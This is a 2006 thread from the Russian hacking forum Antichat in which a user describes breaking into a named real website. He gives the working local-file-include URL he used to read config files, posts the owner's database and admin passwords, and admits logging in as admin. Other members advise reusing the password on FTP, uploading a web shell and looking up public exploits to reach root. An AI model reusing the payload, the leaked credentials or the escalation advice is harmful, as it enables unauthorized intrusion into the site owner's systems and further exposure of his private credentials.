ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Вопросик про userdb и root
  #1  
Старый 25.08.2006, 22:33
Аватар для Muha
Muha
Познающий
Регистрация: 21.08.2006
Сообщений: 70
Провел на форуме:
424011

Репутация: 4
Отправить сообщение для Muha с помощью ICQ
По умолчанию Вопросик про userdb и root

Приветствую всех. Подскажите пожалуйста. Если есть пароли к БД, но не рутовские. Например:
$dbuser="kronas_forum";
$dbpass="1387";
$dbserver="localhost";
$dbname="kronas_forum";
можно ли взломать сайт или как-нибудь достать пароли от рута. Заранее спасибо.
 
Ответить с цитированием

  #2  
Старый 25.08.2006, 22:43
Аватар для em00s7
em00s7
Участник форума
Регистрация: 02.05.2006
Сообщений: 193
Провел на форуме:
530613

Репутация: 25
Отправить сообщение для em00s7 с помощью ICQ
По умолчанию

Доступ к ftp есть?
 
Ответить с цитированием

  #3  
Старый 25.08.2006, 22:57
Аватар для Ch3ck
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию

Цитата:
Доступ к ftp есть?
На мой взгляд, если такой лоховской пароль - 1387, то он скорее всего должен подойти к фтп.
2 Muha Если прокатит, то лей туда какой-нить шелл, а дальше по стандартной теме... Вообщем пробуй...
Хотя чё я говорю-то, откуда он получил эти данные?!-значит шелл-то есть...
Если есть то смотри чё за система или сервисы и ищи сплоеты на милворме каком-нить...

Последний раз редактировалось Dr.Check; 25.08.2006 в 23:02..
 
Ответить с цитированием

  #4  
Старый 25.08.2006, 23:04
Аватар для bul.666
bul.666
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705

Репутация: 1403


Отправить сообщение для bul.666 с помощью ICQ
По умолчанию

Цитата:
Сообщение от Dr.Check  
На мой взгляд, если такой лоховской пароль - 1387, то он скорее всего должен подойти к фтп.
2 Muha Если прокатит, то лей туда какой-нить шелл, а дальше по стандартной теме... Вообщем пробуй...
Хотя чё я говорю-то, откуда он получил эти данные?!-значит шелл-то есть...
Если есть то смотри чё за система или сервисы и ищи на милворме каком-нить...
Лоховский пароль он поставить тока на бд, т.к. это не серьезней фтп =)
Пароль узнать он мог нескольки способами:

- local include
- файл config.php.bak (к примеру)
 
Ответить с цитированием

  #5  
Старый 25.08.2006, 23:11
Аватар для Ch3ck
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию

::Сорри за флейм и оффтоп::
Цитата:
т.к. это не серьезней фтп
ну не согласен с тобой...
Цитата:
Пароль узнать он мог нескольки способами:
- local include
- файл config.php.bak (к примеру)
это ты меня ещё учить будешь?!
Хм, на счёт config.php.bak да и вообще, откуда он мог знать что такой файл есть на серве?
Значит шелл есть...

Последний раз редактировалось Dr.Check; 25.08.2006 в 23:14..
 
Ответить с цитированием

  #6  
Старый 25.08.2006, 23:14
Аватар для Talisman
Talisman
Постоянный
Регистрация: 22.04.2006
Сообщений: 566
Провел на форуме:
1325772

Репутация: 517


Отправить сообщение для Talisman с помощью ICQ
По умолчанию

Цитата:
Сообщение от bul.666  
Лоховский пароль он поставить тока на бд, т.к. это не серьезней фтп =)
Пароль узнать он мог нескольки способами:

- local include
- файл config.php.bak (к примеру)
хы ))) такой лох врятли бы переименовывал в бак )))
апач нужно настраивать, чтобы отдавал тока определенные типы - если тип не определен - запись в лог
 
Ответить с цитированием

  #7  
Старый 25.08.2006, 23:15
Аватар для em00s7
em00s7
Участник форума
Регистрация: 02.05.2006
Сообщений: 193
Провел на форуме:
530613

Репутация: 25
Отправить сообщение для em00s7 с помощью ICQ
По умолчанию

Muha учись задовать вопрос подробнее мы чесно не можем помоч зная только пароли и хост)) так что рассказывай))
 
Ответить с цитированием

  #8  
Старый 25.08.2006, 23:16
Аватар для em00s7
em00s7
Участник форума
Регистрация: 02.05.2006
Сообщений: 193
Провел на форуме:
530613

Репутация: 25
Отправить сообщение для em00s7 с помощью ICQ
По умолчанию

Цитата:
хы ))) такой лох врятли бы переименовывал в бак )))
гЫ..гЫ почему сразу лох?? может админы настроили))
 
Ответить с цитированием

  #9  
Старый 26.08.2006, 00:40
Аватар для Muha
Muha
Познающий
Регистрация: 21.08.2006
Сообщений: 70
Провел на форуме:
424011

Репутация: 4
Отправить сообщение для Muha с помощью ICQ
По умолчанию

Вообщем так. Захожу я как-то к себе в гостевую. Смотрю, кто-то рекламит свой сайт. А я это не очень люблю. Зашёл я в гости к рекламщику. И начал искать знаменитый чат якобы бодра. Это вап сайт http://kronex.vipzone.biz Нашёл я там чат. И начал искать файл syst/bib.php Файла не было. Попробовал syst/wapes.php Я обрадовался. Начал смотреть его пороль от БД к чату таким образом http://kronex.vipzone.biz/speak/chat/syst/wapes.php?ot=../inc.php Страница пустая, но посмотрев исходный код страницы мы видим пароль. Но после того, как я узнал его пароль от БД к чату, я расстроился, так как он был не рутовским
$MySQL_Hostname = "localhost";
$MySQL_Username = "kronas_chat";
$MySQL_Password = "1387";
$MySQLDatabasename = "kronas_chat";
Затем я зашёл в его чат и узнал путь, где лежит сайт /home/kronas/public_html/
Посмотрев на его сайт, я увидел, что у него много скриптов на БД. И начал смотреть пароли ко всем скриптам.
Вот что обнаружил:

$dbuser="kronas_forum";
$dbpass="1387";
$dbserver="localhost";
$dbname="kronas_forum";

$MySQL_Hostname = "localhost";
$MySQL_Username = "kronas_mafia";
$MySQL_Password = "1387";
$MySQLDatabasename = "kronas_mafia";

$user="kronas_tamago4i";
$parol="1387";
$database="kronas_mafia";
$host="localhost";
Имя админа в гостевой книге: Kronus Пароль: c1387z
Зашёл я под админом в гостевую написал ему чтобы он со мной связался по мылу, он так и не написал. Но не в этом суть. Вот меня интересует, что-нибудь можно сделать полезного с этими паролями.
Вот теперь нормально объяснил?
Спасибо, что сразу откликнулись. я встречаю первый форум, где помагают моментально
 
Ответить с цитированием

  #10  
Старый 26.08.2006, 00:41
Аватар для Muha
Muha
Познающий
Регистрация: 21.08.2006
Сообщений: 70
Провел на форуме:
424011

Репутация: 4
Отправить сообщение для Muha с помощью ICQ
По умолчанию

Кстати, к FTPшнику не подошли пароли

Последний раз редактировалось Muha; 26.08.2006 в 01:09..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ОТВЕТЬТЕ please! НА ВОПРОСИК... Болталка 13 15.08.2009 15:09
про socks5 banall *nix 9 11.10.2006 10:17
Помогите откомпилить!! LoFFi Уязвимости 19 19.03.2006 22:56



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ